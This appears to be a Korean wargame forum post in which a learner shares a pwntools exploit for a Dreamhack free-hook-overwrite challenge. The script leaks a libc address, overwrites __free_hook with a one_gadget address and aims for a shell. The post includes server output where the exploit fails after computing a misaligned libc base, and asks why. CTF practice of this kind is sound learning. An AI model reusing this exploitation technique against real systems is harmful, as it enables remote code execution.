exploit test를 통해서 Hook overwrite를 따라해보고 있습니다.
local에서 flag 값까지 얻었는데 실제 서버에서는 flag값이 안나오네요. 뭐가 문제인지 알 수 있을까요?
code
#!/usr/bin/python3
from pwn import *
p = remote("host1.dreamhack.games", 17917)
#p = process("./fho")
e = ELF("./fho")
libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")
def slog(name, addr): return success(": ".join([name, hex(addr)]))
buf = b"A"*0x48
p.sendafter("Buf: ", buf)
p.recvuntil(buf)
libc_start_main_xx = u64(p.recvline()[:-1]+b"\x00"*2)
libc_base = libc_start_main_xx - 0x021b97
free_hook = libc_base + libc.symbols["_free_hook"]
og = libc_base+0x4f302
slog("libc_base", libc_base)
slog("free_hook", free_hook)
p.recvuntil("To write: ")
p.sendline(str(free_hook))
p.recvuntil("With: ")
p.sendline(str(og))
p.recvuntil("To free: ")
p.sendline(str(0x31337)) # doesn't matter
p.interactive()
server 응답
hyunmin@WMRRD11-NC102M3:~/hyunmin$ python result.py
[+] Opening connection to host1.dreamhack.games on port 17917: Done
[] '/home/hyunmin/hyunmin/fho'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[] '/lib/x86_64-linux-gnu/libc-2.27.so'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] libc_base: 0x7f4ec0479060
[+] free_hook: 0x7f4ec0866948
[] Switching to interactive mode
[] Got EOF while reading in interactive
$ ls